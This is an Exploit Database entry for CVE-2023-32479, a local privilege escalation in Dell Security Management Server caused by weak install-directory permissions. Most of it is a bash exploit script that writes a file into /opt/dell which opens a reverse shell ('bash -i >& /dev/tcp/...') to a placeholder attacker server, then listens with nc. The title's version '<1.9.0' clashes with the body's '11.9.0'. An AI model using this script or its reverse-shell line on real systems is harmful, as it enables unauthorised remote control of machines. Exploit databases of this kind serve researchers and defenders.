Dell Security Management Server <1.9.0 - Local Privilege Escalation

• Exploit Database
• 20 阅读

• 作者： Amirhossein Bahramizadeh
  日期： 2024-03-28
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/51934/

• # Exploit Title: [title] Dell Security Management Server versions prior to
  11.9.0
  # Exploit Author: [author] Amirhossein Bahramizadeh
  # CVE : [if applicable] CVE-2023-32479
  Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security
  Management
  Server versions prior to 11.9.0 contain privilege escalation vulnerability
  due to improper ACL of the non-default installation directory. A local
  malicious user could potentially exploit this vulnerability by replacing
  binaries in installed directory and taking the reverse shell of the system
  leading to Privilege Escalation.
  
  #!/bin/bash
  
  INSTALL_DIR="/opt/dell"
  
  # Check if the installed directory has improper ACLs
  if [ -w "$INSTALL_DIR" ]; then
  # Replace a binary in the installed directory with a malicious binary that opens a reverse shell
  echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit"
  echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit"
  chmod +x "$INSTALL_DIR/dell-exploit"
  
  # Wait for the reverse shell to connect to your malicious server
  nc -lvnp 1234
  fi